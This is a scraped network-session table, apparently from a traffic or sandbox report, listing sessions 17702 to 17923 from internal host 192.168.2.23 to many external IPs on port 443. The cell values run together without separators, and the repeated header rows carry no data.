                                                17702192.168.2.2347654155.14.224.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17703192.168.2.2336276184.2.12.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17704192.168.2.235149279.87.176.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17705192.168.2.2334046205.104.242.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17706192.168.2.2340140195.82.248.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17707192.168.2.2340100197.246.176.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17708192.168.2.2339420106.82.8.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17709192.168.2.2353236175.157.139.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17710192.168.2.2341080171.80.125.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17711192.168.2.2349970204.248.174.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17712192.168.2.235791498.40.229.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17713192.168.2.2339606172.51.195.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17714192.168.2.235729095.135.213.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17715192.168.2.234154084.188.187.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17716192.168.2.233987048.148.43.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17717192.168.2.2348736102.45.110.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17718192.168.2.2336700149.10.202.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17719192.168.2.234113880.236.158.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17720192.168.2.2346960135.21.218.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17721192.168.2.2350292166.132.20.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17722192.168.2.233422231.43.224.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17723192.168.2.235732891.80.33.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17724192.168.2.2343848182.33.118.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17725192.168.2.234544847.172.65.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17726192.168.2.2360578213.36.130.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17727192.168.2.2343506216.3.251.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17728192.168.2.235312074.176.88.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17729192.168.2.2345342106.233.225.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17730192.168.2.233828283.50.117.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17731192.168.2.234955067.17.169.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17732192.168.2.2341142220.122.126.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17733192.168.2.2335780197.230.170.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17734192.168.2.2339552180.185.234.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17735192.168.2.235478091.156.4.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17736192.168.2.2350076141.20.37.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17737192.168.2.2336154212.213.83.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17738192.168.2.2333994148.119.38.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17739192.168.2.233755095.73.127.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17740192.168.2.2348848159.10.212.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17741192.168.2.2336882117.223.37.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17742192.168.2.2336954143.88.134.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17743192.168.2.2359632101.127.115.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17744192.168.2.234599040.241.195.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17745192.168.2.234854042.108.108.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17746192.168.2.2352262211.83.26.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17747192.168.2.2353418170.139.225.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17748192.168.2.2358268123.118.161.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17749192.168.2.2340548203.33.198.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17750192.168.2.2339232106.241.95.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17751192.168.2.235913012.100.253.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17752192.168.2.233743882.219.213.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17753192.168.2.2333016159.41.221.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17754192.168.2.2359350139.89.194.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17755192.168.2.235475831.40.27.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17756192.168.2.2357324217.26.242.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17757192.168.2.234511496.54.204.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17758192.168.2.234051025.80.250.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17759192.168.2.2349842102.241.124.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17760192.168.2.2356260188.196.84.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17761192.168.2.234725644.117.169.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17762192.168.2.2335564167.117.118.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17763192.168.2.233932462.117.77.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17764192.168.2.2336388204.202.26.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17765192.168.2.23536705.155.51.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17766192.168.2.234738857.174.237.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17767192.168.2.23417264.2.116.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17768192.168.2.2337596103.161.146.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17769192.168.2.233609280.89.71.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17770192.168.2.2348044133.136.63.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17771192.168.2.2342394125.13.192.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17772192.168.2.234596653.36.112.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17773192.168.2.2334598106.62.92.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17774192.168.2.234986042.103.226.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17775192.168.2.2352924115.121.182.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17776192.168.2.234134027.143.111.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17777192.168.2.2360790120.178.53.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17778192.168.2.235949058.28.253.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17779192.168.2.23514348.37.143.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17780192.168.2.2333322180.70.16.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17781192.168.2.2359174145.8.161.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17782192.168.2.234158812.81.53.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17783192.168.2.2347798108.2.61.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17784192.168.2.2343180135.195.75.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17785192.168.2.2351080190.15.121.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17786192.168.2.2334952120.41.32.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17787192.168.2.2347470185.145.121.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17788192.168.2.235608091.141.214.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17789192.168.2.2340638102.161.142.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17790192.168.2.23361224.95.9.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17791192.168.2.23371482.98.231.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17792192.168.2.2337628117.66.212.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17793192.168.2.2343840114.234.232.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17794192.168.2.2348320154.50.190.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17795192.168.2.2356084200.168.221.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17796192.168.2.2358190181.156.44.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17797192.168.2.234750814.181.26.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17798192.168.2.235053218.117.193.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17799192.168.2.2355520128.175.25.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17800192.168.2.234631243.112.29.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17801192.168.2.234082492.165.92.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17802192.168.2.234866069.55.126.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17803192.168.2.2348326144.239.119.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17804192.168.2.2337758102.71.125.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17805192.168.2.2348442167.134.203.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17806192.168.2.2350974108.62.25.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17807192.168.2.2358708183.114.138.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17808192.168.2.2339648108.202.191.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17809192.168.2.233905494.140.93.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17810192.168.2.2353430123.96.133.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17811192.168.2.234482014.245.222.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17812192.168.2.2355554103.237.5.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17813192.168.2.2352812212.81.233.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17814192.168.2.235864080.19.224.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17815192.168.2.235038087.174.44.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17816192.168.2.235839086.232.172.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17817192.168.2.2351944220.1.54.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17818192.168.2.233887046.110.216.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17819192.168.2.235058251.102.80.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17820192.168.2.2359732180.125.26.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17821192.168.2.2337628149.82.200.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17822192.168.2.234832641.162.6.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17823192.168.2.2351818197.122.61.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17824192.168.2.2342316116.121.71.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17825192.168.2.235749646.119.17.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17826192.168.2.2334310191.146.42.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17827192.168.2.2352416193.42.142.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17828192.168.2.2359792136.79.222.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17829192.168.2.233882462.63.191.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17830192.168.2.233607436.168.68.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17831192.168.2.23434464.9.87.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17832192.168.2.2354700183.161.11.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17833192.168.2.23545424.21.175.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17834192.168.2.2336320106.209.240.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17835192.168.2.2360808118.23.237.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17836192.168.2.2347692172.201.8.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17837192.168.2.234114223.165.154.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17838192.168.2.233695246.55.214.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17839192.168.2.2342258135.123.51.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17840192.168.2.2351178202.169.89.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17841192.168.2.2343958148.227.112.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17842192.168.2.2350108145.130.111.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17843192.168.2.2332844151.48.188.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17844192.168.2.235464672.128.136.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17845192.168.2.2342714186.96.15.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17846192.168.2.2355508151.6.135.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17847192.168.2.2336884208.52.66.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17848192.168.2.234267436.22.107.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17849192.168.2.2358056143.45.20.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17850192.168.2.2348610149.7.79.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17851192.168.2.233953472.18.134.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17852192.168.2.234953690.234.189.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17853192.168.2.235414617.33.148.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17854192.168.2.2352902141.83.116.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17855192.168.2.2355160151.76.228.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17856192.168.2.2341786157.246.219.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17857192.168.2.235387436.191.198.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17858192.168.2.2334248175.83.5.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17859192.168.2.234144839.121.131.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17860192.168.2.2360110165.169.196.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17861192.168.2.2350786106.167.165.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17862192.168.2.2351376181.108.106.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17863192.168.2.2336050181.211.165.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17864192.168.2.234647217.3.161.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17865192.168.2.2354404220.246.210.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17866192.168.2.23483642.113.252.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17867192.168.2.234397424.88.91.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17868192.168.2.235813012.139.144.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17869192.168.2.2349360165.138.26.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17870192.168.2.2357960209.133.151.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17871192.168.2.2346800199.119.1.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17872192.168.2.2347228171.88.125.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17873192.168.2.2347306147.90.241.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17874192.168.2.2347304208.254.222.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17875192.168.2.2338490131.36.170.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17876192.168.2.2347202197.148.38.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17877192.168.2.23349742.181.182.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17878192.168.2.2340338149.187.126.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17879192.168.2.235417070.112.179.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17880192.168.2.2338612103.204.230.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17881192.168.2.234254678.17.177.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17882192.168.2.2358942163.77.241.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17883192.168.2.2340572222.209.129.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17884192.168.2.2346086135.120.106.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17885192.168.2.2338404110.29.149.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17886192.168.2.236027893.6.133.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17887192.168.2.2342392170.116.34.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17888192.168.2.233523877.183.111.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17889192.168.2.235926060.222.112.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17890192.168.2.2344614186.28.154.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17891192.168.2.234191860.121.178.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17892192.168.2.234890034.182.238.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17893192.168.2.233568632.206.63.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17894192.168.2.2352552150.156.154.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17895192.168.2.234697448.74.229.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17896192.168.2.2337358219.99.63.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17897192.168.2.2345466193.58.41.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17898192.168.2.233343645.187.57.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17899192.168.2.2354486217.60.226.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17900192.168.2.234515852.150.106.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17901192.168.2.2335504124.220.194.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17902192.168.2.233289662.33.127.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17903192.168.2.2333672204.194.212.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17904192.168.2.235310069.244.123.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17905192.168.2.23360282.177.16.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17906192.168.2.2359650148.70.36.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17907192.168.2.235302817.195.65.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17908192.168.2.2343744212.5.254.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17909192.168.2.2356508111.15.193.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17910192.168.2.234326885.4.151.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17911192.168.2.2348864112.100.63.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17912192.168.2.2350266139.186.72.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17913192.168.2.2346050219.180.64.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17914192.168.2.234491266.120.40.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17915192.168.2.235233875.240.59.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17916192.168.2.2338802166.247.89.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17917192.168.2.2342254141.211.105.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17918192.168.2.233420853.175.190.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17919192.168.2.2354596162.223.59.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17920192.168.2.2346502138.35.25.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17921192.168.2.2348154191.115.4.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17922192.168.2.233436643.31.7.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17923192.168.2.234253838.24.40.6443
                                                TimestampBytes transferredDirectionData


